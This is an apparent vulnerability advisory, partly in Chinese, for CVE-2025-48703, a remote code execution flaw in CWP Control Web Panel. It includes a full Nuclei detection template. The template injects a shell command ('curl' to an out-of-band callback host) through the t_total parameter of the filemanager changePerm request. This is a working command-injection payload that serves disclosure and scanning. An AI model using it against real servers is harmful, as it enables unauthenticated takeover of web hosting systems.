CVE-2025-48703: CWP (Control Web Panel) < 0.9.8.1205 - Remote Code Execution

日期: 2025-08-01 | 影响软件: CWP Control Web Panel | POC: 已公开

漏洞描述

CWP (Control Web Panel) < 0.9.8.1205 contains a remote code execution caused by shell metacharacters in the t_total parameter in filemanager changePerm request, letting unauthenticated attackers execute code remotely, exploit requires knowledge of a valid non-root username.

PoC代码[已公开]

id: CVE-2025-48703

info:
  name: CWP (Control Web Panel) < 0.9.8.1205 - Remote Code Execution
  author: theamanrawat
  severity: critical
  description: |
    CWP (Control Web Panel) < 0.9.8.1205 contains a remote code execution caused by shell metacharacters in the t_total parameter in filemanager changePerm request, letting unauthenticated attackers execute code remotely, exploit requires knowledge of a valid non-root username.
  impact: |
    Unauthenticated attackers can execute arbitrary code remotely, potentially leading to full system compromise.
  remediation: |
    Update to version 0.9.8.1205 or later.
  reference:
    - https://fenrisk.com/rce-centos-webpanel
    - https://nvd.nist.gov/vuln/detail/CVE-2025-48703
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.0
    cve-id: CVE-2025-48703
    epss-score: 0.51557
    epss-percentile: 0.97754
    cwe-id: CWE-78
  metadata:
    verified: false
    shodan-query: 'Server: cwpsrv'
  tags: cve,cve2025,cwp,cwpsrv,rce,intrusive,file-upload,oast,oob,vkev,kev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /login/index.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, 'Control WebPanel', 'cwp')"
        condition: and
        internal: true

  - raw:
      - |
        POST /{{username}}/index.php?module=filemanager&acc=changePerm HTTP/1.1
        Host: {{hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrTrcHpS9ovyhBLtb

        ------WebKitFormBoundaryrTrcHpS9ovyhBLtb
        Content-Disposition: form-data; name="fileName"

        .bashrc
        ------WebKitFormBoundaryrTrcHpS9ovyhBLtb
        Content-Disposition: form-data; name="currentPath"

        /home/{{username}}
        ------WebKitFormBoundaryrTrcHpS9ovyhBLtb
        Content-Disposition: form-data; name="recursive"


        ------WebKitFormBoundaryrTrcHpS9ovyhBLtb
        Content-Disposition: form-data; name="t_total"

        curl {{interactsh-url}}
        ------WebKitFormBoundaryrTrcHpS9ovyhBLtb

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 490a004630440220197ec95ca291d0705d53983dad941935f6146218b345daf326833b7a39d4026b02203b05a7c7050897f270ac62613ba2c6fcbbe362dbb7e1e7171945ecf6c5fea2b6:922c64590222798bb761d5b6d8e72950